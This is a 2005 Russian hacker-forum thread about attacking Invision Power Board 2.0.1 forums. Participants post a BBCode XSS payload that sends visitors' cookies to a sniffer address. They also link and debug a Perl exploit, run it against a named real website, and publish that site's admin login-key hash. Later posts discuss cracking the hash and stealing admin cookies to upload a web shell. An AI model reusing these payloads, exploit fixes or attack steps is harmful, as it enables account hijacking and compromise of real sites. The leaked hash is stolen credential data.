Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   IPB v2.0.1 - Что это такое? И с чем его едят? (https://forum.antichat.xyz/showthread.php?t=11054)

Dimazzz 24.11.2005 00:30

IPB v2.0.1 - Что это такое? И с чем его едят?
 
Что это такое? И с чем его едят? Можите по этому движку что нить дать?

*Van* 24.11.2005 00:37

1.сплойт от http://rst.void.ru
2.xss wj.

Dimazzz 24.11.2005 00:40

Цитата:

Сообщение от Ван
1.сплойт от http://rst.void.ru
2.xss wj.

Дай по конкретней ссылку :))
и что нужно говорят исправить в сплоите?

FQziT 24.11.2005 00:49

что тебе ещё давать???????? и так всё понятно!
1.зайди на вышк указанный сайт => Exploits => там ищи сплойты для IPB 2.0.1
2.воспользуйся поиском по форуму! тут уже не раз давали прямую ссылку на тему, но попробуй сам поискать...

Dimazzz 24.11.2005 01:01

Цитата:

Сообщение от <<YaYaYa>>
что тебе ещё давать???????? и так всё понятно!
1.зайди на вышк указанный сайт => Exploits => там ищи сплойты для IPB 2.0.1
2.воспользуйся поиском по форуму! тут уже не раз давали прямую ссылку на тему, но попробуй сам поискать...

Да я понимаю но в этом сплоите есть ошибка??? какая она

W.W. 24.11.2005 03:53

Я бы дал такую ссылку. Там всё есть. А от собственного нежелания искать (между прочим, за 10 минут можно управиться) нечего напрягать других.

Barsik 24.11.2005 13:24

Код XSS
Код HTML:

[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[1].src="Адрес_Сниффера?"+document.cookie) [/COLOR]
Сплоит качай тут (Исправленный)
www.barsik.jino-net.ru/ipb.rar

Сплоит удалю сегодня вечером так что качай :)

Dimazzz 24.11.2005 14:09

Цитата:

Сообщение от Barsik
Код XSS
Код HTML:

[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[1].src="Адрес_Сниффера?"+document.cookie) [/COLOR]
Сплоит качай тут (Исправленный)
www.barsik.jino-net.ru/ipb.rar

Сплоит удалю сегодня вечером так что качай :)

Код XXS как? куда? его применить?

m0nzt3r 24.11.2005 14:11

Ipb ни с чем не едят блин..
да и вообще иди выучи что такое хсс и потом спрашивай.....

FQziT 24.11.2005 14:42

Код Xss, который тебе дали нужно отредактировать под свой или ачатовский, или любой другой сниффер, а потом запостить всё это на форуме или втыкнуть в подпись и ждать пока придут куки.....
Спрашивай, что не понятно, если сам знаю, то объясню-)))) И не забывай про репутацию...;-)

Dimazzz 24.11.2005 16:48

C:\>c:\perl\sploit\ipb.pl www.himclan.com /forum/ 1 1
[~] SERVER : www.himclan.com
[~] PATH : /forum/
[~] MEMBER ID : 1
[~] TARGET : 1 - IPB 2.*
[~] SEARCHING PASSWORD ... [|]Can't use an undefined value as a symbol reference
at c:\perl\sploit\ipb.pl line 134.

сплоит вот что пишет что значит?

FQziT 24.11.2005 17:16

Это значит, что в сплойте есть ошибка в строке 134.

Barsik 25.11.2005 22:22

Цитата:

Сообщение от <<YaYaYa>>
Это значит, что в сплойте есть ошибка в строке 134.

Нет не обязательно.
У меня такое бывает довольно часто. А раза с пятого хэшик получаю. Хотя может ошибка и другая была :)

k1b0rg 25.11.2005 22:36

Цитата:

C:\>c:\perl\sploit\ipb.pl www.himclan.com /forum/ 1 1
[~] SERVER : www.himclan.com
[~] PATH : /forum/
[~] MEMBER ID : 1
[~] TARGET : 1 - IPB 2.*
[~] SEARCHING PASSWORD ... [|]Can't use an undefined value as a symbol reference
at c:\perl\sploit\ipb.pl line 134.
попробуй написать
site.ru /forum/ 1 0

Otaku 26.11.2005 07:33

Кстати у меня тоже 2 раза выскакивала ошибка в строке 134. Баг видимо в сплойте.

FQziT 26.11.2005 12:39

Цитата:

Сообщение от Otaku
Кстати у меня тоже 2 раза выскакивала ошибка в строке 134. Баг видимо в сплойте.

Не знаю, у меня ни разу такого не было.

FHT 26.11.2005 13:17

Это значит что сплоит получает в ответ символ, который не может корректно обработать, зависит не от сплоита, а от ответа сервера который бомбишь.

Barsik 26.11.2005 14:06

Да все работает...
Вот вам Хэш Админа

C:\Tools\Программы>perl ipb.pl www.himclan.com /forum/ 1 1
[~] SERVER : www.himclan.com
[~] PATH : /forum/
[~] MEMBER ID : 1
[~] TARGET : 1 - IPB 2.*
[~] SEARCHING PASSWORD ... [ DONE ]

MEMBER ID : 1
MEMBER_LOGIN_KEY : b65e23ca7ec5961b2c6710237c988e48

Не забудьте про репутацию :))
PS На форуме присутствует также XSS Баг :))

FHT 26.11.2005 15:34

Эге...
Могу еще один сплоит посоветовать, если найдешь...
ipb_skides.pl
Классная тема... Нужная, найдешь береги, не давай никому...
:)

Barsik 26.11.2005 17:24

На Ачате есть этот сплоит. Вроде он :)
http://forum.antichat.ru/threadnav8206-3-10.html

FHT 26.11.2005 19:38

Не совсем тот, там есть отличия.
Не буду их тут приводить там защита "от дурака" =)
И тот, что ты указал, немного переделанный...
Ну там хоть защиту не сняли...
А кто снимал так заведомо не правильно =)

Dimazzz 02.12.2005 02:27

А что нить еще можите надыбть с этого форума? )) И ссылочку на прогу что хэш ломает не подскажите?

Dimazzz 02.12.2005 03:02

Чет немогу этот хэш ломануть ((

Otaku 02.12.2005 04:08

Версия форума 2.*.*!
Ты с солью расшифровываешь?

Barsik 02.12.2005 13:44

Если даже и без соли то пасс не так скоро появится... Возможно только через неделю расшифровки получишь его :(

FHT 02.12.2005 15:49

Господа!
Есть вопрос по поводу сплоита
который выдает вместо хеша нули...
Я сам в перле вообще не силен, а сплоит мне давали по-знакомству, уже рабочий...
Вчера, ставил себе Вынды и потер его случаем...
Помогите кто может....
-----
ЗЫ. Не обижайтесь плз за вопрос...

FQziT 02.12.2005 16:10

Цитата:

Сообщение от ShturmBanFurrer
Господа!
Есть вопрос по поводу сплоита
который выдает вместо хеша нули...
Я сам в перле вообще не силен, а сплоит мне давали по-знакомству, уже рабочий...
Вчера, ставил себе Вынды и потер его случаем...
Помогите кто может....
-----
ЗЫ. Не обижайтесь плз за вопрос...

Если ты говоришь про сплойт r57ipb2, то замени строку под номером 90 на
Код HTML:

$allchar .= chr($char);
Если помог, то не забывай про репутацию ;-) Другие бы в поиск послали=))))

FHT 02.12.2005 16:20

Неа не то...
Эту ашипку я и сам нашел и понял...
Другой сплоит, то о чем мы с тобой спорили...
Цитата:

# Exploit coded by "ReMuSOMeGa & Nova" and http://www.h4cky0u.org
Смотри на http://de-face.jino-net.ru/ipbnull.txt

FQziT 02.12.2005 17:39

Цитата:

Сообщение от ShturmBanFurrer
Другой сплоит, то о чем мы с тобой спорили...

Я пользуюсь сплойтом от rst, он на мой взгляд лучше, хотя они используют одну и туже уязвимость.... Щас посмотрел на тот, на который ты мне ссылку дал..... ну во-первых last там нужно вообще убрать и изменить строку, где log in написано.....
Хотя я тебе советую пользоваться сплойтом от rst! ИМХО Его править намного легче=)) А так разницы ни какой.

FHT 02.12.2005 17:59

Цитата:

Сообщение от <<YaYaYa>>
Я пользуюсь сплойтом от rst, он на мой взгляд лучше, хотя они используют одну и туже уязвимость.... Щас посмотрел на тот, на который ты мне ссылку дал..... ну во-первых last там нужно вообще убрать и изменить строку, где log in написано.....
Хотя я тебе советую пользоваться сплойтом от rst! ИМХО Его править намного легче=)) А так разницы ни какой.

Хех... Мучался искал где там last, не нашол вупор...
Пользоваться rstipb2.pl там бессмысленно выдает [Failed].
Ну с Log In я понял.
Спасиб ==> +

FQziT 02.12.2005 18:16

Если выдаёт [Failed], то значит, что форум скорее всего пропатчен.... Ты ещё попробуй=) Просто если от rst сплойт выдаёт фэйлд, то и тот тоже не будет хэш выдавать...
да не за что-)
Если хочешь, то я тебе могу на мыло скинуть рабочий сплойт r57ipb2=) Или тут выложить, как хочешь, если надо.

Barsik 02.12.2005 18:26

ShturmBanFurrer
Дай ссылку на форум

SanyaX 02.12.2005 18:30

Да если 2* то мне кажется тебе бес толку ломать сайт если 1.* то ещё есть возможность. Но а так же можно просто куки у админа украсть потом подставить потом зайти в админку залить шелл и дело сделано.

FHT 02.12.2005 18:39

Цитата:

Да если 2* то мне кажется тебе бес толку ломать сайт если 1.* то ещё есть возможность. Но а так же можно просто куки у админа украсть потом подставить потом зайти в админку залить шелл и дело сделано.
Если ты меняешь куки, то ты зайдешь только до учетки админа, в админку тебе не попасть, там стоит еще одна проверка на пароль.
Или если я не прав раскажи как.

FQziT 02.12.2005 18:40

Цитата:

Сообщение от SanyaX
Но а так же можно просто куки у админа украсть потом подставить потом зайти в админку залить шелл и дело сделано.

Тут идёт речь об IPB, следовательно хэш расшифровать полюбому надо, если хочешь в админку. А просто подставка кук не поможет.

FHT 02.12.2005 18:44

Цитата:

Сообщение от Barsik
ShturmBanFurrer
Дай ссылку на форум

Не сильно хочу что бы его изуродовали...
Если кого интересует, то стучите в АСЮ 33-83-53-5
Там поговорим. Расскажу реакцию сайта на хсс. Не стоит тут флудить.
Может я чем отблагодарю, если мои возможности совпадут с вашими желаниями.

FQziT 02.12.2005 18:48

Цитата:

Сообщение от ShturmBanFurrer
Не стоит тут флудить

Вот с этим я согласен=)))


Время: 11:27